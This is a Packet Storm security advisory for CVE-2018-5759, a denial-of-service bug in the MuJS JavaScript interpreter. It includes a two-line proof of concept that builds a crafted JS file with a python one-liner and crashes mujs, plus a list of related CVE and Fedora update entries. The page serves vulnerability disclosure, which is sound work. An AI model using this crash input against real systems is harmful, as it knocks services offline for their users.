Lucene search
Andrea SindoniPACKETSTORM:146119HistoryJan 27, 2018 - 12:00 a.m.
Artifex MuJS Denial Of Service
2018-01-2700:00:00
Andrea Sindoni
packetstormsecurity.com
29
EPSS
0.003
Percentile
71.2%
`The continuous call between the two functions "jsC_cexp" function and "cbinary"
allows attackers to cause a denial of service (application crash) via a
crafted js file
# Exploit Title: DoS caused by the interactive call between two functions
# Date: 2018-01-16
# Exploit Author: Andrea Sindoni - @invictus1306
# Vendor: Artifex (https://www.artifex.com/)
# Software Link: https://github.com/ccxvii/mujs
# Version: Mujs - 228719d087aa5e27dcd8627c4acf7273476bdbca
# Tested on: Linux
# CVE : CVE-2018-5759
Simple poc:
# python -c "print 'func%d'*80000" > poc.js
# mujs poc.js
Fixed in commit 4d45a96e57fbabf00a7378b337d0ddcace6f38c1 (
http://git.ghostscript.com/?p=mujs.git;a=commit;h=
4d45a96e57fbabf00a7378b337d0ddcace6f38c1)
Please let me know if you need more info.
Andrea Sindoni
`
Related
cvelist
cvelist
CVE-2018-5759
2018-01-24 21:00:00
prion
prion
Design/Logic Flaw
2018-01-24 21:29:00
cve
cve
CVE-2018-5759
2018-01-24 21:29:00
zdt
zdt
Artifex MuJS 1.0.2 - Integer Overflow Exploit
2018-01-28 00:00:00
debiancve
debiancve
CVE-2018-5759
2018-01-24 21:29:00
nvd
nvd
CVE-2018-5759
2018-01-24 21:29:00
exploitpack
exploitpack
Artifex MuJS 1.0.2 - Integer Overflow
2018-01-28 00:00:00
osv
osv
CVE-2018-5759
2018-01-24 21:29:00
exploitdb
exploitdb
Artifex MuJS 1.0.2 - Integer Overflow
2018-01-28 00:00:00
openvas
openvas
Fedora Update for mujs FEDORA-2018-5b2e981f14
2018-02-15 00:00:00
Fedora Update for mujs FEDORA-2018-d4746c772f
2018-02-15 00:00:00
fedora
fedora
[SECURITY] Fedora 27 Update: mujs-0-11.20180129git25821e6.fc27
2018-02-14 17:33:06
[SECURITY] Fedora 26 Update: mujs-0-11.20180129git25821e6.fc26
2018-02-14 17:11:09
nessus
nessus
Fedora 27 : mujs (2018-5b2e981f14)
2018-02-15 00:00:00
Fedora 26 : mujs (2018-d4746c772f)
2018-02-15 00:00:00